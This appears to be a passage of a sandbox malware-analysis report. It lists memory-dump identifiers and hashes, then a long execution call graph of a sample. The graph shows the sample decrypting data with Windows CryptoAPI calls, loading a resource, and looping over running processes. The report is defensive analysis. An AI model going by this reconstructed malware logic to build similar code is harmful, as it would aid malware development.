                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentVariable
                                                                  • String ID: ?O@
                                                                  • API String ID: 1431749950-3511380453
                                                                  • Opcode ID: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                                  • Instruction ID: 315e17eccb05daff3adc91fa9074d23558c2207180d60d9b2b56ce26dbf77fcb
                                                                  • Opcode Fuzzy Hash: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                                  • Instruction Fuzzy Hash: 24F06272200118BFDB00AFA9DC458AEB7EDEF88764B51402BF904D72A1D7B4AD008B98

                                                                  Execution Graph

                                                                  Execution Coverage:5.4%
                                                                  Dynamic/Decrypted Code Coverage:31.9%
                                                                  Signature Coverage:9.1%
                                                                  Total number of Nodes:2000
                                                                  Total number of Limit Nodes:82
std::_Lockit::~_Lockit 2 API calls 108916->108917 108918 6c85c0ae 108917->108918 108918->108860 108920 6c85c022 108921 6c85c03b 108920->108921 108931 6c859ef0 RaiseException Concurrency::cancel_current_task 108920->108931 108932 6c89c32c RaiseException _Yarn Concurrency::cancel_current_task 108921->108932 108925 6c859c87 108924->108925 108926 6c859c2b 108924->108926 108925->108915 108927 6c89c14e std::_Lockit::_Lockit 7 API calls 108926->108927 108928 6c859c41 108927->108928 108929 6c89c17f std::_Lockit::~_Lockit 2 API calls 108928->108929 108929->108925 108930->108920 108932->108916 108934 6c8803d7 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 108933->108934 108935 6c86acb5 108934->108935 108936 6c86ab30 48 API calls 108935->108936 108937 6c86acbf 108936->108937 108937->108837 108939 6c89c6b3 108938->108939 108945 6c89c710 108939->108945 108947 6c9d0fe1 108939->108947 108941 6c89c707 108941->108945 108958 6c9d0c84 108941->108958 108943 6c89c722 108943->108945 108962 6c9d48b3 108943->108962 108945->108842 108946->108840 108948 6c9d0fec ___scrt_is_nonwritable_in_current_image 108947->108948 108949 6c9d101f 108948->108949 108950 6c9d0fff 108948->108950 108954 6c9d100f 108949->108954 108966 6c9df918 108949->108966 108980 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 108950->108980 108954->108941 108959 6c9d0c97 __snprintf_s 108958->108959 109044 6c9d0f37 108959->109044 108961 6c9d0cac __snprintf_s 108961->108943 108963 6c9d48c6 __snprintf_s 108962->108963 109106 6c9d4971 108963->109106 108965 6c9d48d2 __snprintf_s 108965->108945 108967 6c9df924 ___scrt_is_nonwritable_in_current_image 108966->108967 108982 6c9d246c EnterCriticalSection 108967->108982 108969 6c9df932 108983 6c9df9bc 108969->108983 108974 6c9dfce2 108975 6c9dfced 108974->108975 109003 6c9d0a33 108975->109003 108978 6c9d1063 108981 6c9d108c LeaveCriticalSection __fread_nolock 108978->108981 108980->108954 108981->108954 108982->108969 108987 6c9df9df 108983->108987 
108984 6c9dfa37 108999 6c9d92c7 HeapFree GetLastError __dosmaperr 108984->108999 108987->108984 108990 6c9df93f 108987->108990 108997 6c9c539a EnterCriticalSection 108987->108997 108998 6c9c53ae LeaveCriticalSection 108987->108998 108988 6c9dfa49 108988->108990 109000 6c9db577 6 API calls std::_Lockit::_Lockit 108988->109000 108994 6c9df978 108990->108994 108991 6c9dfa68 109001 6c9c539a EnterCriticalSection 108991->109001 109002 6c9d2483 LeaveCriticalSection 108994->109002 108996 6c9d103a 108996->108954 108996->108974 108997->108987 108998->108987 108999->108988 109000->108991 109001->108990 109002->108996 109004 6c9d0a52 109003->109004 109005 6c9d0a65 109004->109005 109007 6c9d0a7a 109004->109007 109019 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109005->109019 109014 6c9d0b9a 109007->109014 109020 6c9d2c6a 45 API calls ___crtDownlevelLCIDToLocaleName 109007->109020 109008 6c9d0a75 109008->108978 109016 6c9e8ba0 109008->109016 109011 6c9d0bea 109011->109014 109021 6c9d2c6a 45 API calls ___crtDownlevelLCIDToLocaleName 109011->109021 109013 6c9d0c08 109013->109014 109022 6c9d2c6a 45 API calls ___crtDownlevelLCIDToLocaleName 109013->109022 109014->109008 109023 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109014->109023 109024 6c9e8f58 109016->109024 109019->109008 109020->109011 109021->109013 109022->109014 109023->109008 109025 6c9e8f64 ___scrt_is_nonwritable_in_current_image 109024->109025 109026 6c9e8f6b 109025->109026 109027 6c9e8f96 109025->109027 109042 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109026->109042 109033 6c9e8bc0 109027->109033 109032 6c9e8bbb 109032->108978 109034 6c9d6218 __wsopen_s 45 API calls 109033->109034 109035 6c9e8be2 109034->109035 109036 6c9c4aa2 __wsopen_s 6 API calls 109035->109036 109037 6c9e8bef 109036->109037 109038 6c9e8c2e __wsopen_s 92 API calls 109037->109038 109039 6c9e8bf6 109037->109039 109038->109039 109040 6c9d92c7 ___free_lconv_mon HeapFree GetLastError 109039->109040 109041 6c9e8c28 
109039->109041 109040->109041 109043 6c9e8fed LeaveCriticalSection __wsopen_s 109041->109043 109042->109032 109043->109032 109046 6c9d0f43 ___scrt_is_nonwritable_in_current_image 109044->109046 109045 6c9d0f49 109067 6c9d1f20 24 API calls 2 library calls 109045->109067 109046->109045 109048 6c9d0f8c 109046->109048 109055 6c9c539a EnterCriticalSection 109048->109055 109049 6c9d0f64 109049->108961 109051 6c9d0f98 109056 6c9d0e4b 109051->109056 109053 6c9d0fae 109068 6c9d0fd7 LeaveCriticalSection __fread_nolock 109053->109068 109055->109051 109057 6c9d0e5e 109056->109057 109058 6c9d0e71 109056->109058 109057->109053 109069 6c9d0d72 109058->109069 109060 6c9d0e94 109061 6c9d0f22 109060->109061 109062 6c9d0eaf 109060->109062 109082 6c9d55cb 29 API calls 3 library calls 109060->109082 109061->109053 109073 6c9d4ac9 109062->109073 109067->109049 109068->109049 109070 6c9d0ddb 109069->109070 109071 6c9d0d83 109069->109071 109070->109060 109071->109070 109083 6c9dfabe 26 API calls 2 library calls 109071->109083 109074 6c9d0ec2 109073->109074 109075 6c9d4ae2 109073->109075 109079 6c9dfafe 109074->109079 109075->109074 109084 6c9d0c5d 109075->109084 109077 6c9d4afe 109089 6c9e1b16 109077->109089 109100 6c9dfc5f 109079->109100 109081 6c9dfb17 109081->109061 109082->109062 109083->109070 109085 6c9d0c7e 109084->109085 109086 6c9d0c69 109084->109086 109085->109077 109087 6c9d1d77 ___crtDownlevelLCIDToLocaleName 24 API calls 109086->109087 109088 6c9d0c79 109087->109088 109088->109077 109090 6c9e1b22 ___scrt_is_nonwritable_in_current_image 109089->109090 109091 6c9e1b63 109090->109091 109093 6c9e1ba9 109090->109093 109099 6c9e1b2a 109090->109099 109092 6c9d1f20 ___crtDownlevelLCIDToLocaleName 24 API calls 109091->109092 109092->109099 109094 6c9d1491 __wsopen_s EnterCriticalSection 109093->109094 109095 6c9e1baf 109094->109095 109096 6c9e1bcd 109095->109096 109097 6c9e18fa __wsopen_s 67 API calls 109095->109097 109098 6c9e1c1f __wsopen_s LeaveCriticalSection 109096->109098 
109097->109096 109098->109099 109099->109074 109101 6c9d10a3 __wsopen_s 24 API calls 109100->109101 109102 6c9dfc71 109101->109102 109103 6c9dfc8d SetFilePointerEx 109102->109103 109105 6c9dfc79 __wsopen_s 109102->109105 109104 6c9dfca5 GetLastError 109103->109104 109103->109105 109104->109105 109105->109081 109107 6c9d497d ___scrt_is_nonwritable_in_current_image 109106->109107 109108 6c9d49aa 109107->109108 109109 6c9d4987 109107->109109 109111 6c9d49a2 109108->109111 109117 6c9c539a EnterCriticalSection 109108->109117 109132 6c9d1f20 24 API calls 2 library calls 109109->109132 109111->108965 109113 6c9d49c8 109118 6c9d48e3 109113->109118 109115 6c9d49d5 109133 6c9d4a00 LeaveCriticalSection __fread_nolock 109115->109133 109117->109113 109119 6c9d48f0 109118->109119 109120 6c9d4913 109118->109120 109145 6c9d1f20 24 API calls 2 library calls 109119->109145 109122 6c9d4ac9 ___scrt_uninitialize_crt 69 API calls 109120->109122 109130 6c9d490b 109120->109130 109123 6c9d492b 109122->109123 109134 6c9ddbfc 109123->109134 109126 6c9d0c5d __fread_nolock 24 API calls 109127 6c9d493f 109126->109127 109138 6c9e1670 109127->109138 109130->109115 109132->109111 109133->109111 109135 6c9d4933 109134->109135 109136 6c9ddc13 109134->109136 109135->109126 109136->109135 109147 6c9d92c7 HeapFree GetLastError __dosmaperr 109136->109147 109139 6c9e1699 109138->109139 109144 6c9d4946 109138->109144 109140 6c9e16e8 109139->109140 109142 6c9e16c0 109139->109142 109156 6c9d1f20 24 API calls 2 library calls 109140->109156 109148 6c9e1713 109142->109148 109144->109130 109146 6c9d92c7 HeapFree GetLastError __dosmaperr 109144->109146 109145->109130 109146->109130 109147->109135 109149 6c9e171f ___scrt_is_nonwritable_in_current_image 109148->109149 109150 6c9d1491 __wsopen_s EnterCriticalSection 109149->109150 109151 6c9e172d 109150->109151 109152 6c9e15d0 __wsopen_s 27 API calls 109151->109152 109153 6c9e175e 109151->109153 109152->109153 109154 6c9e1798 LeaveCriticalSection 109153->109154 
109155 6c9e1781 109154->109155 109155->109144 109156->109144 109158 6c86b920 109157->109158 109164 6c86bd50 109158->109164 109160 6c86b947 109160->108799 109168 6c8677a0 109161->109168 109162 6c87bd86 109162->108801 109166 6c86bd9b 109164->109166 109165 6c86bda3 std::ios_base::_Ios_base_dtor 109165->109160 109166->109165 109167 6c85bf70 71 API calls 109166->109167 109167->109165 109170 6c86782e 109168->109170 109175 6c8678dc 109170->109175 109176 6c867eb0 109170->109176 109173 6c86794c 109173->109175 109184 6c9d4ec0 109173->109184 109175->109162 109177 6c8678e9 109176->109177 109178 6c867ed1 109176->109178 109177->109173 109177->109175 109180 6c9d0cbe 109177->109180 109178->109177 109194 6c9d5bcd 73 API calls __snprintf_s 109178->109194 109181 6c9d0cd1 __snprintf_s 109180->109181 109182 6c9d0f37 72 API calls 109181->109182 109183 6c9d0ce6 __snprintf_s 109182->109183 109183->109173 109185 6c9d4ecb 109184->109185 109186 6c9d4ee0 109184->109186 109199 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109185->109199 109187 6c9d4efd 109186->109187 109188 6c9d4ee8 109186->109188 109195 6c9d5595 109187->109195 109200 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109188->109200 109190 6c9d4ef8 109190->109175 109192 6c9d4edb 109192->109175 109194->109177 109196 6c9d55a9 __snprintf_s 109195->109196 109201 6c9d5b3e 109196->109201 109198 6c9d55b5 __snprintf_s 109198->109190 109199->109192 109200->109190 109202 6c9d5b4a ___scrt_is_nonwritable_in_current_image 109201->109202 109203 6c9d5b74 109202->109203 109204 6c9d5b51 109202->109204 109212 6c9c539a EnterCriticalSection 109203->109212 109227 6c9d1f20 24 API calls 2 library calls 109204->109227 109207 6c9d5b82 109213 6c9d599d 109207->109213 109209 6c9d5b91 109228 6c9d5bc3 LeaveCriticalSection __fread_nolock 109209->109228 109211 6c9d5b6a 109211->109198 109212->109207 109214 6c9d59ac 109213->109214 109215 6c9d59d4 109213->109215 109232 6c9d1f20 24 API calls 2 library calls 109214->109232 109217 6c9d0c5d 
__fread_nolock 24 API calls 109215->109217 109219 6c9d59dd 109217->109219 109218 6c9d59c7 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 109218->109209 109229 6c9dfb1c 109219->109229 109222 6c9d5a9e 109222->109218 109234 6c9d57d2 28 API calls 2 library calls 109222->109234 109223 6c9d5a87 109233 6c9d5627 29 API calls 4 library calls 109223->109233 109225 6c9d5a96 109225->109218 109227->109211 109228->109211 109235 6c9dfb3a 109229->109235 109232->109218 109233->109225 109234->109218 109237 6c9dfb46 ___scrt_is_nonwritable_in_current_image 109235->109237 109236 6c9d59fb 109236->109218 109236->109222 109236->109223 109237->109236 109238 6c9dfb89 109237->109238 109240 6c9dfbcf 109237->109240 109239 6c9d1f20 ___crtDownlevelLCIDToLocaleName 24 API calls 109238->109239 109239->109236 109241 6c9d1491 __wsopen_s EnterCriticalSection 109240->109241 109242 6c9dfbd5 109241->109242 109243 6c9dfbf6 109242->109243 109244 6c9dfc5f __fread_nolock 26 API calls 109242->109244 109245 6c9dfc57 LeaveCriticalSection 109243->109245 109244->109243 109245->109236 109247 6c85d00a 109246->109247 109249 6c85d01c 109247->109249 109252 6c857ea0 25 API calls 109247->109252 109251 6c85d05b 109249->109251 109253 6c858070 27 API calls 109249->109253 109251->108811 109253->109251 109257 6c866f40 109254->109257 109255 6c87be13 109255->108816 109260 6c866fd3 109257->109260 109261 6c866ff3 109257->109261 109258 6c867225 109258->109260 109263 6c9d524f 109258->109263 109259 6c9d524f __fread_nolock 41 API calls 109259->109261 109260->109255 109261->109258 109261->109259 109261->109260 109266 6c9d51b2 109263->109266 109268 6c9d51be ___scrt_is_nonwritable_in_current_image 109266->109268 109267 6c9d51f6 109267->109260 109268->109267 109269 6c9d5208 109268->109269 109272 6c9d51d1 std::bad_exception::bad_exception 109268->109272 109277 6c9c539a EnterCriticalSection 109269->109277 109271 6c9d5212 109278 6c9d526c 109271->109278 109287 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109272->109287 109277->109271 
109279 6c9d5229 109278->109279 109281 6c9d527e std::bad_exception::bad_exception 109278->109281 109288 6c9d5247 LeaveCriticalSection __fread_nolock 109279->109288 109280 6c9d528b std::bad_exception::bad_exception 109308 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109280->109308 109281->109279 109281->109280 109285 6c9d0c5d __fread_nolock 24 API calls 109281->109285 109289 6c9e23c9 109281->109289 109309 6c9c9c96 24 API calls 3 library calls 109281->109309 109310 6c9e2992 109281->109310 109285->109281 109287->109267 109288->109267 109290 6c9e23d4 109289->109290 109291 6c9e23e1 109290->109291 109294 6c9e23f9 109290->109294 109358 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109291->109358 109293 6c9e2458 109295 6c9d0c5d __fread_nolock 24 API calls 109293->109295 109294->109293 109302 6c9e23f1 109294->109302 109359 6c9e3dc1 HeapFree GetLastError ___free_lconv_mon 109294->109359 109297 6c9e2471 109295->109297 109347 6c9e2879 109297->109347 109299 6c9e2479 109300 6c9d0c5d __fread_nolock 24 API calls 109299->109300 109299->109302 109301 6c9e24aa 109300->109301 109301->109302 109303 6c9d0c5d __fread_nolock 24 API calls 109301->109303 109302->109281 109304 6c9e24b8 109303->109304 109304->109302 109305 6c9d0c5d __fread_nolock 24 API calls 109304->109305 109306 6c9e24c6 109305->109306 109307 6c9d0c5d __fread_nolock 24 API calls 109306->109307 109307->109302 109308->109279 109309->109281 109311 6c9e29bc 109310->109311 109312 6c9e29a4 __dosmaperr 109310->109312 109311->109312 109314 6c9e2a3a 109311->109314 109315 6c9e2a0a __dosmaperr 109311->109315 109312->109281 109316 6c9e2a53 109314->109316 109317 6c9e2a8e 109314->109317 109319 6c9e2a60 __dosmaperr 109314->109319 109380 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109315->109380 109316->109319 109339 6c9e2a7c 109316->109339 109369 6c9d9301 109317->109369 109368 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109319->109368 109321 6c9e2a9f 109374 6c9d92c7 HeapFree GetLastError __dosmaperr 
109321->109374 109322 6c9e2bda 109325 6c9e2c4e 109322->109325 109328 6c9e2bf3 GetConsoleMode 109322->109328 109327 6c9e2c52 ReadFile 109325->109327 109326 6c9e2aa8 109375 6c9d92c7 HeapFree GetLastError __dosmaperr 109326->109375 109330 6c9e2c6a 109327->109330 109331 6c9e2cc6 GetLastError 109327->109331 109328->109325 109332 6c9e2c04 109328->109332 109330->109331 109336 6c9e2c43 109330->109336 109344 6c9e2a77 __fread_nolock __dosmaperr 109331->109344 109332->109327 109334 6c9e2c0a ReadConsoleW 109332->109334 109333 6c9e2aaf 109333->109344 109376 6c9dfabe 26 API calls 2 library calls 109333->109376 109334->109336 109337 6c9e2c24 GetLastError 109334->109337 109340 6c9e2c8f 109336->109340 109341 6c9e2ca6 109336->109341 109336->109344 109337->109344 109363 6c9e656f 109339->109363 109378 6c9e2d9b 28 API calls 2 library calls 109340->109378 109343 6c9e2cbf 109341->109343 109341->109344 109379 6c9e303f 27 API calls __fread_nolock 109343->109379 109377 6c9d92c7 HeapFree GetLastError __dosmaperr 109344->109377 109346 6c9e2cc4 109346->109344 109348 6c9e2885 ___scrt_is_nonwritable_in_current_image 109347->109348 109349 6c9e2918 109348->109349 109350 6c9e288d __dosmaperr 109348->109350 109353 6c9e28bf __dosmaperr 109348->109353 109360 6c9d1491 EnterCriticalSection 109349->109360 109350->109299 109352 6c9e291e 109355 6c9e2992 __fread_nolock 37 API calls 109352->109355 109356 6c9e293d __dosmaperr 109352->109356 109361 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109353->109361 109355->109356 109362 6c9e298a LeaveCriticalSection __wsopen_s 109356->109362 109358->109302 109359->109293 109360->109352 109361->109350 109362->109350 109365 6c9e657c 109363->109365 109366 6c9e6589 109363->109366 109364 6c9e6595 109364->109322 109365->109322 109366->109364 109381 6c9d1d77 24 API calls ___crtDownlevelLCIDToLocaleName 109366->109381 109368->109344 109371 6c9d933d 109369->109371 109372 6c9d930f __fread_nolock 109369->109372 109370 6c9d932a RtlAllocateHeap 109370->109371 
109370->109372 109371->109321 109372->109370 109372->109371 109382 6c9cf6bb EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase 109372->109382 109374->109326 109375->109333 109376->109339 109377->109312 109378->109344 109379->109346 109380->109312 109381->109365 109382->109372 109384 6c8661c4 109383->109384 109385 6c866204 109383->109385 109386 6c867eb0 73 API calls 109384->109386 109385->108819 109387 6c8661da 109386->109387 109388 6c9d48b3 74 API calls 109387->109388 109388->109385 109392 6c865fc0 109389->109392 109391 6c86a1c4 109391->108822 109393 6c86600a 109392->109393 109394 6c8661a0 76 API calls 109393->109394 109395 6c86602e 109393->109395 109394->109395 109395->109391 109397 6c8595bc 109396->109397 109399 6c8595cc 109397->109399 109400 6c859040 24 API calls 109397->109400 109399->108657 109400->109399 109462 6c85fde0 109401->109462 109404 6c86130f CryptAcquireContextW 109406 6c861392 109404->109406 109407 6c86135b 109404->109407 109410 6c8613c5 CryptImportKey 109406->109410 109537 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109407->109537 109409 6c861374 109538 6c9c21a1 RaiseException 109409->109538 109411 6c86147b 109410->109411 109412 6c861429 109410->109412 109414 6c861483 CryptSetKeyParam 109411->109414 109539 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109412->109539 109417 6c8614b4 109414->109417 109418 6c86151a CryptSetKeyParam 109414->109418 109416 6c860080 24 API calls 109423 6c8617c2 109416->109423 109541 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109417->109541 109421 6c8615c1 109418->109421 109422 6c86155b 109418->109422 109419 6c86145d 109540 6c9c21a1 RaiseException 109419->109540 109420 6c861159 109430 6c861256 109420->109430 109536 6c860ed0 27 API calls 109420->109536 109545 6c861930 27 API calls 109421->109545 109543 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109422->109543 109423->108662 109427 6c8615ea 109434 
6c8615fd CryptDecrypt 109427->109434 109429 6c8614fc 109542 6c9c21a1 RaiseException 109429->109542 109483 6c8600a0 109430->109483 109433 6c8615a3 109544 6c9c21a1 RaiseException 109433->109544 109436 6c8616af 109434->109436 109437 6c861642 109434->109437 109548 6c860e90 27 API calls 109436->109548 109546 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109437->109546 109440 6c86168a 109547 6c9c21a1 RaiseException 109440->109547 109442 6c86138d 109442->109416 109443 6c8616fa 109549 6c857a60 27 API calls 109443->109549 109445 6c86173b 109446 6c861762 109445->109446 109448 6c858670 24 API calls 109445->109448 109550 6c860080 109446->109550 109448->109446 109450 6c860080 24 API calls 109451 6c861775 109450->109451 109452 6c860080 24 API calls 109451->109452 109453 6c86177d 109452->109453 109454 6c860080 24 API calls 109453->109454 109459 6c85f796 109458->109459 109460 6c85f7a1 109458->109460 109459->108664 109461 6c859590 24 API calls 109460->109461 109461->109459 109553 6c859440 109462->109553 109464 6c85fe2a CryptStringToBinaryA 109465 6c85fe72 109464->109465 109466 6c85fe9b 109464->109466 109555 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109465->109555 109557 6c85ffe0 27 API calls 109466->109557 109468 6c85fe83 109556 6c9c21a1 RaiseException 109468->109556 109471 6c85febc 109472 6c85fed2 CryptStringToBinaryA 109471->109472 109473 6c85ff4e 109472->109473 109474 6c85ff19 109472->109474 109476 6c85ff64 109473->109476 109478 6c860080 24 API calls 109473->109478 109558 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109474->109558 109476->109420 109477 6c85ff2c 109559 6c9c21a1 RaiseException 109477->109559 109478->109476 109480 6c85ff49 109481 6c860080 24 API calls 109480->109481 109482 6c85ff8f 109481->109482 109482->109420 109484 6c8600ec 109483->109484 109485 6c8600f4 CryptAcquireContextW 109484->109485 109486 6c86013c 109485->109486 109534 6c860177 109485->109534 109560 6c85ffa0 24 API calls 
std::invalid_argument::invalid_argument 109486->109560 109488 6c860152 109561 6c9c21a1 RaiseException 109488->109561 109490 6c860172 109491 6c860080 24 API calls 109490->109491 109492 6c8608af 109491->109492 109492->109404 109493 6c8601ad CryptCreateHash 109494 6c8601e6 109493->109494 109493->109534 109562 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109494->109562 109496 6c860214 109563 6c9c21a1 RaiseException 109496->109563 109498 6c8606ed 109576 6c861010 27 API calls 109498->109576 109499 6c86025f CryptHashData 109501 6c860291 109499->109501 109499->109534 109564 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109501->109564 109504 6c8602d0 109565 6c9c21a1 RaiseException 109504->109565 109506 6c86078a 109577 6c861010 27 API calls 109506->109577 109507 6c860445 CryptHashData 109509 6c8604d7 CryptGetHashParam 109507->109509 109510 6c860477 109507->109510 109512 6c860529 109509->109512 109509->109534 109568 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109510->109568 109511 6c860858 109515 6c860080 24 API calls 109511->109515 109570 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109512->109570 109516 6c860868 109515->109516 109517 6c860080 24 API calls 109516->109517 109519 6c860870 109517->109519 109523 6c860080 24 API calls 109519->109523 109521 6c8604b9 109569 6c9c21a1 RaiseException 109521->109569 109522 6c8605ab CryptGetHashParam 109526 6c8605e5 109522->109526 109522->109534 109527 6c860878 109523->109527 109524 6c86056b 109571 6c9c21a1 RaiseException 109524->109571 109573 6c85ffa0 24 API calls std::invalid_argument::invalid_argument 109526->109573 109529 6c860080 24 API calls 109527->109529 109530 6c860880 109529->109530 109530->109404 109532 6c860627 109574 6c9c21a1 RaiseException 109532->109574 109534->109493 109534->109498 109534->109499 109534->109507 109534->109522 109566 6c860a60 27 API calls 109534->109566 109567 6c860c70 27 API calls 109534->109567 109572 6c860e90 27 API calls 
109534->109572 109575 6c860ed0 27 API calls 109534->109575 109536->109430 109537->109409 109538->109442 109539->109419 109540->109442 109541->109429 109542->109442 109543->109433 109544->109442 109545->109427 109546->109440 109547->109442 109548->109443 109549->109445 109578 6c861ec0 109550->109578 109554 6c859457 109553->109554 109554->109464 109555->109468 109556->109466 109557->109471 109558->109477 109559->109480 109560->109488 109561->109490 109562->109496 109563->109490 109564->109504 109565->109490 109566->109534 109567->109534 109568->109521 109569->109490 109570->109524 109571->109490 109572->109534 109573->109532 109574->109490 109575->109534 109576->109506 109577->109511 109579 6c861ed5 109578->109579 109581 6c86008f 109579->109581 109582 6c861fa0 24 API calls 109579->109582 109581->109450 109582->109581 109617 6c858a40 109613->109617 109615 6c873b09 109615->108686 109616->108713 109618 6c858a69 109617->109618 109619 6c858b60 27 API calls 109618->109619 109620 6c858a7d 109619->109620 109620->109615 109621->108721 109623 6c857c26 109622->109623 109625 6c857c38 109623->109625 109628 6c857ea0 25 API calls 109623->109628 109627 6c857c7d 109625->109627 109629 6c858070 27 API calls 109625->109629 109627->108730 109629->109627 109631 6c87960a FindResourceW 109630->109631 109631->108743 109631->108744 109633 6c857b10 27 API calls 109632->109633 109634 6c878756 109633->109634 109635 6c857b10 27 API calls 109634->109635 109636 6c878775 109635->109636 109637 6c861100 40 API calls 109636->109637 109638 6c8787a8 109637->109638 109639 6c858670 24 API calls 109638->109639 109640 6c8787b8 109639->109640 109641 6c858670 24 API calls 109640->109641 109642 6c8787c3 109641->109642 109656 6c8789f0 73 API calls 109642->109656 109645 6c878836 109646 6c858670 24 API calls 109645->109646 109647 6c878922 109646->109647 109658 6c878c60 24 API calls 109647->109658 109648 6c878030 27 API calls 109650 6c8787ed 109648->109650 109650->109645 109650->109648 109654 6c858670 24 API calls 
109650->109654 109655 6c85f760 24 API calls 109650->109655 109657 6c878b60 71 API calls 109650->109657 109651 6c87892a 109652 6c858670 24 API calls 109651->109652 109653 6c878935 109652->109653 109653->108744 109654->109650 109655->109650 109656->109650 109657->109650 109658->109651 109660 6c877e7e 109659->109660 109661 6c877e96 109660->109661 109662 6c877eaf 109660->109662 109663 6c857b10 27 API calls 109661->109663 109671 6c878030 27 API calls 109662->109671 109664 6c877ea7 109663->109664 109664->108751 109666->108768 109671->109664 109677 6c879bd8 109673->109677 109674 6c857b10 27 API calls 109674->109677 109676 6c858670 24 API calls 109676->109677 109677->109674 109677->109676 109678 6c879c27 109677->109678 109679 6c879c78 Sleep 109677->109679 109912 6c879760 CreateToolhelp32Snapshot 109677->109912 109680 6c857b10 27 API calls 109678->109680 109679->109677 109681 6c879c40 109680->109681 109924 6c8799c0 29 API calls 109681->109924 109683 6c879c56 109684 6c858670 24 API calls 109683->109684 109685 6c879c63 109684->109685 109687 6c872120 __wsopen_s 109686->109687 109688 6c857b10 27 API calls 109687->109688 109689 6c872159 109688->109689 109690 6c8720a0 28 API calls 109689->109690 109691 6c87216f _Yarn 109690->109691 109925 6c8737f0 109691->109925 109693 6c8721de _Yarn 109694 6c8737f0 27 API calls 109693->109694 109695 6c87225c 109694->109695 109929 6c871ca0 109695->109929 109913 6c8797b6 std::bad_exception::bad_exception 109912->109913 109914 6c8797bb 109912->109914 109915 6c8797e4 Process32FirstW 109913->109915 109914->109677 109916 6c87981d 109915->109916 109917 6c879939 CloseHandle 109915->109917 109918 6c879827 WideCharToMultiByte 109916->109918 109920 6c858670 24 API calls 109916->109920 109921 6c8798c8 CloseHandle 109916->109921 109922 6c8798f1 Process32NextW 109916->109922 109917->109914 109919 6c857b10 27 API calls 109918->109919 109919->109916 109920->109916 109921->109914 109922->109916 109923 6c87992f 109922->109923 109923->109917 109924->109683 109926 
6c87385f 109925->109926 109997 6c876d40 109926->109997 109928 6c8738b1 109928->109693 109930 6c871ce6 109929->109930 110005 6c871dd0 109930->110005 109932 6c871d03 109998 6c876d86 109997->109998 110002 6c876e22 109998->110002 110003 6c861b80 27 API calls 109998->110003 110000 6c876dce 110004 6c861c50 24 API calls 110000->110004 110002->109928 110003->110000 110004->110002 110006 6c871df4 110005->110006 110007 6c871df9 110005->110007 110006->109932 110007->110006 110008 6c871e38 110007->110008 110010 6c871e6f 110007->110010 110010->110006 110102 6c9dce5d 110103 6c9dce66 110102->110103 110107 6c9dce98 110102->110107 110108 6c9d960e 110103->110108 110109 6c9d9619 110108->110109 110110 6c9d961f 110108->110110 110156 6c9db47b 6 API calls std::_Lockit::_Lockit 110109->110156 110113 6c9d9625 110110->110113 110157 6c9db4ba 6 API calls std::_Lockit::_Lockit 110110->110157 110115 6c9d962a 110113->110115 110163 6c9d4551 45 API calls CallUnexpected 110113->110163 110136 6c9dd21e 110115->110136 110116 6c9d9639 110116->110113 110118 6c9d9666 110116->110118 110119 6c9d9651 110116->110119 110160 6c9db4ba 6 API calls std::_Lockit::_Lockit 110118->110160 110158 6c9db4ba 6 API calls std::_Lockit::_Lockit 110119->110158 110126 6c9d965d 110159 6c9d92c7 HeapFree GetLastError __dosmaperr 110126->110159 110127 6c9d9672 110129 6c9d9685 110127->110129 110130 6c9d9676 110127->110130 110162 6c9d92c7 HeapFree GetLastError __dosmaperr 110129->110162 110161 6c9db4ba 6 API calls std::_Lockit::_Lockit 110130->110161 110137 6c9dd248 110136->110137 110164 6c9dd0aa 110137->110164 110140 6c9dd261 110140->110107 110141 6c9d9301 __fread_nolock 3 API calls 110142 6c9dd272 110141->110142 110143 6c9dd288 110142->110143 110144 6c9dd27a 110142->110144 110172 6c9dcea5 53 API calls 3 library calls 110143->110172 110171 6c9d92c7 HeapFree GetLastError __dosmaperr 110144->110171 110147 6c9dd2b5 110148 6c9dd2c0 110147->110148 110150 6c9dd2db __DllMainCRTStartup@12 110147->110150 110173 6c9d92c7 HeapFree 
